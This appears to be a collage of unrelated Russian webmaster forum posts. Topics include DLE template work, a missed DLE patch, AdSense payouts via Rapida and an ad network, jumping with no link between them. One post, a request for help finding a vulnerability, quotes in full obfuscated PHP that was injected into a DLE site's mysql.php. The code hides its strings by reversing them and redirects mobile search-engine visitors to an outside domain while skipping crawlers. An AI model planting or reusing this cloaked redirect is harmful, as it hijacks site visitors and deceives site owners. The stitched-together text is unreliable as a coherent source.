закончили с ТС макет, тема была довольно своеобразная, получилось то что и задумывали по ТЗ. Сергей всегда на связи по icq или мылу, поэтому по ходу дела исправляли и домысливали, сотрудничество получилось плодотворным.
вот этот патч не был установлен: http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html
с утра его поставил, т.е это в нём дело? как обычно рассылку на мыло не сделали о его выходе.
kgtu5, у меня все официальные, с лицензией, поэтому данное обстоятельство причиной быть не может. да и вообще я не понимаю тех, кто ставит левые версии, для клиентов же можно ставить демку до 100 постов с открытым кодом, её вполне хватает, потом можно лицензию докупить.
никакие другие файлы вроде не появлялись и не менялись, комп был выключен, меня дома не было, т.е никакие пароли не могли уйти.
Всем доброго дня. Был в поездке, сейчас приехал и обнаружил на одном сайте (dle 10.0), в /engine/classes/mysql.php появился вот такой код:
*/ $usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth'))];$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];$rf = $_SERVER[strrev(strtoupper('rerefer_ptth'))]; if(!preg_match('/crawl|andex|oogle|bot/i',$usg)) {if(preg_match('/andex|mail|rambler|oogle/i',$rf)) {if((preg_match('/ndroid|midp|j2me|symbian|series\ 60|symbos|htc_/i',$usg)) and (!isset ($_COOKIE['dle_user_id'])) and ($_COOKIE["mt_"] != 1) and ($_COOKIE["ynd"] != 1)) {@setcookie('ynd', 1); header(strrev('//:pt'.'th :noi'.'tac'.'oL').$ref.'/');exit;} else if(($_COOKIE["mt_"] != 1) && ($_COOKIE["ynd"] == 1)) {@setcookie('mt_', '1', time()+86400 * 7, '/'); header(strrev('=rerefer&1?'.'/ten.'.'lld-'.'swen'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}}
код убрал, прошу спецов подсказать где копать на уязвимость.
extra, отличное предложение, правда если уже на тарифе Elite, то выходит никакой тебе шабашной пятницы:) может что-то и для нас придумаете?
Leo-seo, Dreamfall прав, мы получали платёж на почте от НКО Рапида с примечанием "Оплата Adsense" (типа за что платёж). Поэтому прям от гугла получал только тот, кто ждал чеков.
Если вбит номер шаблона, то так или иначе должен исполняться он и все его условия, а там чётко указано, что перевод от моего имени. Конечно, мы посмотрим как оно реально будет, когда придут первые платежи. Но сейчас мне кажется толку получать на почте совсем никакого нет. Постараюсь в поддержке рапиды узнать от кого по шаблону будут деньги поступать на карту, отпишусь как ответят.
Sower, как раз хотел написать тот же вопрос. Народ, кто уже получал по шаблонам, расскажите, вписанная в шаблон сумма роли не играет? Я сделал шаблон с суммой большей, чем получаю - это правильно? Или наоборот нужно сумму меньшую вбить?
Для тех кто будет делать шаблон перевода почтой, не обращайте внимание, что он пишет ограничение в 15000, пишите любую сумму, он её сохранит.
Раз такой геморрой пошёл с этой рапидой и всё равно свои данные я подтвердил, то может стоит теперь переводить деньги себе на банковскую карту? Раньше получал на почте, но сейчас мы по-сути сами себе отправляем деньги по шаблону (отправители мы же), поэтому пополнение от себя же своей карты не должно вызывать подозрений. Единственный момент, так это что рапида сольёт наши данные. Но смысла теперь получать на почте нет, только стоять там, время тратить. Я правильно мыслю или у кого есть другие соображения?
Переработали шаблон дле прямо онлайн в режиме диалога в icq, вчера вечером списались, сегодня уже работа готова. Я доволен, ТС в сети регулярно, выполнил все поставленные задачи.
Не знаю, загибается ли эта контора, но предложения о сотрудничестве постоянно приходят от них по моим сайтам. Если руководство компании читает данную ветку, то наконец проверьте русский язык Ваших менеджеров, в каждом письмо по 25 грубых ошибок. Такое ощущение, что таджики пишут, да ещё и настойчиво мне рассказывают про seo, как благотворно на него влияет их ПП.
заказывал ТС обновление шаблона ДЛЕ под актуальную версию скрипта, работу получил быстро, буквально через несколько часов. нареканий нет, обязательно обращусь ещё.
